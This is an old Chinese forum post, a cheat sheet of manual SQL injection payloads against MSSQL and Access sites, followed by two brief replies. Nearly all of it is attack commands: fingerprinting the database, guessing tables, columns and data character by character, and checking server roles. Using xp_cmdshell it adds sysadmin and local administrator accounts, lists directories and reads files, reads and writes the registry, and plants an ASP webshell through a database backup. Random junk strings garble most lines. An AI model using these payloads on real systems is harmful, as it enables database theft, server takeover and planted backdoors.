社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4431阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 ]L $\ #  
  2.初步判断是否是mssql ;and user>0 gQg"j)  
py!|\00}  
  3.注入参数是字符'and [查询条件] and ''=' t;Sb/3  
NjScc%@y  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' e7Z32P0ls  
0B/,/KX  
  5.判断数据库系统 Su7?;Oh/yI  
$\BE&4g  
  ;and (select count(*) from sysobjects)>0 mssql S(I{NL}= $  
]EBxl=C}D  
  ;and (select count(*) from msysobjects)>0 access  .-c4wm}  
=E4LRKn  
7 :xfPx  
kQSy+q  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 /QWvW=F2<  
ay ;S4c/_  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 u@UMP@"#  
.CABH,Po:  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 VcO0sa f`  
61>.vT8P  
  9.(1)猜字段的ascii值(access) EStB#V^  
g`' !HGY  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 mbxZL<ua  
C.yQ=\U2  
  (2)猜字段的ascii值(mssql) HGs $*  
b\kdKVh&  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 D6Ui!  
f!uwzHA`?  
  10.测试权限结构(mssql) @[<><uTH  
s}9S8@#  
Y-_`23x`  
R6Km\N  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- m@2QnA[ 4  
OmpND{w  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- V)HG(k  
kR-SE5`Jk  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- Nho>f  
L^2%1GfE{  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- #ym'AN  
fI}to&qk  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- -`kW&I0  
'Ym9;~(@R  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- vXf!G`D  
feDlH[$  
  ;and 1=(select IS_MEMBER('db_owner'));-- t ;;U}  
|O|V-f{l  
EzM ?Nft  
N=5a54!/  
  11.添加mssql和系统的帐户 QvlObEhcS  
Z, Yb&b  
  ;exec master.dbo.sp_addlogin username;-- l'-Bu(  
  ;exec master.dbo.sp_password null,username,password;-- qFCOUl  
zm5]J  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- wx= $2N6  
?}tFN_X"  
  ;exec master.dbo.xp_cmdshell 'net user username password *=/ { HvJ  
Cazocq5  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- x_N'TjS^{  
(l~AV9!m:  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- RUnSCOdX  
_?m(V=z>  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- Eex~xiiV  
J s@hLP `  
\O3m9,a   
A5I)^B<(  
  12.(1)遍历目录 rxvx  
MDZ640-Y  
  ;create table dirs(paths varchar(100), id int) KK/tu+"  
2>xF){`  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' np"\19^  
X; \+<LE  
  ;and (select top 1 paths from dirs)>0 a od-3"7[  
r[`9uVT/  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) *eTqVG.  
jjRi*^d9  
'6iEMg&3  
P6'1.R  
  (2)遍历目录 jjB~G^n  
h,u, ^ r  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- PB\(=  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 `!;_ho  
gZ3u=uME  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 Xv5wJlc!d  
D[[|")Fn  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 r"gJX  
^B.5GK)!  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 p?%y82E  
P:K5",)  
 ul6]!Iy  
v!-/&}W)1  
  13.mssql中的存储过程 36&e.3/#  
F4-$~ v@  
  xp_regenumvalues 注册表根键, 子键 +aCv&sg  
w>s,"2&5J  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 .GP T!lDc  
YNyk1cE  
  xp_regread 根键,子键,键值名  j|DsG,  
T"}5}6rSG  
  ;exec xp_regread X Swl Tg  
?|\ER#z  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 [\98$BN  
E!)xj.aS$  
  xp_regwrite 根键,子键, 值名, 值类型, 值 (&Kk7<#`  
5FPM`hLT  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 &v/dj@   
MO]F1E?X  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 JQ_sUYh~3  
#>("CAB02T  
  xp_regdeletevalue 根键,子键,值名 ~|D Ut   
)5Q~I,dP  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 YlJ@XpKM  
\$~|ZwV{  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 $t'MSlF  
y4 #>X  
T@H ^BGs  
vFzRg5lH  
  14.mssql的backup创建webshell ^qvZXb  
1APe=tJ  
  use model Fbr;{T .  
8+Lm's=W*  
  create table cmd(str image); ~f&E7su-6+  
+ /4A  
  insert into cmd(str) values (''); ONB{_X?  
@ p9i  
  backup database model to disk='c:\l.asp'; )Yh+c=6 ?  
38Mv25N  
x}wG:K  
a_^\=&?'  
  15.mssql内置函数 q5J5>  
Gt8M&S-;  
  ;and (select @@version)>0 获得Windows的版本号 ,a{P4Bq  
;IvY^(YS@;  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa 7J D' )  
?8H8O %Z8  
  ;and (select user_name())>0 爆当前系统的连接用户 G/y5H;<9M  
]!W=^!  
  ;and (select db_name())>0 得到当前连接的数据库 ihhDOmUto  
U|H=Y"pL  
6##_%PO<m  
m^!Z_]A![  
  16.简洁的webshell xk9%F?)  
L81ZbNU?$  
  use model T#T*Zw"+  
j1Y~_  
  create table cmd(str image); 4B8 oO  
R"/GQ`^AqA  
  insert into cmd(str) values (''); 59 T 8r  
{Y(zd[  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
描述
快速回复

您目前还是游客,请 登录注册
温馨提示:欢迎交流讨论,请勿纯表情、纯引用!
认证码:
验证问题:
10+5=?,请输入中文答案:十五